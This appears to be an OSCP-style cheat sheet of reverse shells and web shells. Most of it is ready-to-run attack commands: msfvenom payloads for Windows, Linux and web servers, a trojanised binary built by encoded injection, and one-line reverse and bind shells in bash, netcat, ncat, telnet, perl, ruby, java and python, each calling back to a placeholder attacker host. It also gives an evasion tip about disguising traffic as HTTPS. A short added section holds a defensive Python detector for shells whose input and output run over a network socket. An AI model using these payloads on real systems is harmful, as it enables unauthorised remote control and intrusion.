OSCP
Shells

Reverse-shells

This is a great collection of different types of reverse shells and web shells. Many of the ones listed below come from this cheat-sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/

Windows

Meterpreter
Standard meterpreter
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse.exe
```

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
```
Meterpreter HTTPS
This makes the Meterpreter traffic look like ordinary HTTPS. Because the communication is encrypted, it can also pass through deep-packet inspection.

```bash
msfvenom -p windows/meterpreter/reverse_https LHOST=ip LPORT=443 -f exe -o met_https_reverse.exe
```
Non-staged payload
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exe
```

```
use exploit/multi/handler
set payload windows/shell_reverse_tcp
```
Staged payload
A staged payload must be caught with the Metasploit handler; it does not work with netcat.

```
use exploit/multi/handler
set payload windows/shell/reverse_tcp
```

Inject payload into binary

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
```

Linux

Binary

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f elf > shell.elf
```

Bash

```bash
0<&196;exec 196<>/dev/tcp/ip/80; sh <&196 >&196 2>&196
```

```bash
bash -i >& /dev/tcp/ip/8080 0>&1
```

Php

```bash
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```

Netcat

Bind shell
```bash
# Linux: listener on the target, then connect to it
nc -vlp 5555 -e /bin/bash
nc ip 5555

# Windows
nc.exe -nlvp 4444 -e cmd.exe
```

Reverse shell

```bash
# Linux: listener on the attacking machine, then connect back from the target
nc -lvp 5555
nc ip 5555 -e /bin/bash

# Windows
nc -lvp 443
nc.exe ip 443 -e cmd.exe
```

With -e flag

```bash
nc -e /bin/sh ATTACKING-IP 80
```

```bash
/bin/sh | nc ATTACKING-IP 80
```

Without -e flag

```bash
# the named pipe /tmp/p carries the shell's output back into nc,
# while nc's output is piped into the shell's stdin
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p 2>&1
```

Ncat

Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. On a pentest job you might not want to communicate unencrypted.
Bind

```bash
# listener on the target, restricted to one client address, TLS-wrapped
ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
ncat -v ip 5555 --ssl
```

Telnet

```bash
# same named-pipe trick as the netcat version, with telnet as the transport
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/sh 1>/tmp/p 2>&1
```

```bash
# two connections: commands arrive on port 80, output leaves on port 443
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
```

Perl

```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

Ruby

```bash
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

Java

```java
// plain-Java form; the cheat-sheet original used Groovy syntax (untyped r/p, "as String[]", "\$line")
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash", "-c",
    "exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do $line 2>&5 >&5; done"});
p.waitFor();
```

Python

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
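The bash /dev/tcp, nc -e, perl, ruby and python shells above all leave the same trace on the host: a shell process whose stdin, stdout and stderr are the network socket. The following detection script is an added example, not part of the cheat-sheet; it assumes the Linux /proc layout (/proc/<pid>/comm and /proc/<pid>/fd) and reports such processes.

```python
import os
import re
from typing import Dict, List, Tuple

# Every interactive reverse shell above (bash /dev/tcp, nc -e, perl, ruby,
# python) leaves a shell whose fds 0, 1 and 2 are the network socket, which
# a normally launched shell (terminal or pipe) never has.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")

def is_socket_backed_shell(comm: str, fd_targets: Dict[int, str]) -> bool:
    """comm is /proc/<pid>/comm; fd_targets maps fd -> readlink of /proc/<pid>/fd/<fd>."""
    if comm not in SHELLS:
        return False
    return all(SOCKET_RE.match(fd_targets.get(fd, "")) for fd in (0, 1, 2))

def read_proc_entry(pid: int) -> Tuple[str, Dict[int, str]]:
    """Read comm and fd link targets for one pid (assumes Linux /proc layout)."""
    with open(f"/proc/{pid}/comm") as f:
        comm = f.read().strip()
    fd_dir = f"/proc/{pid}/fd"
    targets: Dict[int, str] = {}
    for name in os.listdir(fd_dir):
        try:
            targets[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue  # fd closed between listdir and readlink
    return comm, targets

def scan_proc() -> List[int]:
    """Return pids of socket-backed shells readable by the current user."""
    hits: List[int] = []
    if not os.path.isdir("/proc"):
        return hits  # not Linux, nothing to scan
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            comm, targets = read_proc_entry(int(name))
        except OSError:
            continue  # process exited, or fds of other users' processes need root
        if is_socket_backed_shell(comm, targets):
            hits.append(int(name))
    return hits

if __name__ == "__main__":
    for pid in scan_proc():
        print(f"socket-backed shell: pid {pid}")
```

The mknod/named-pipe variants in the netcat and telnet sections do not match this rule, since their shell's fds point at /tmp/p and a pipe rather than a socket, so they need a separate check on the nc or telnet process itself.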

Web-shells

PHP

This PHP shell is OS-independent. You can use it on both Linux and Windows.

```bash
msfvenom -p php/meterpreter_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.php
```

ASP

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f asp > shell.asp
```

WAR

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f war > shell.war
```

JSP

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.jsp
```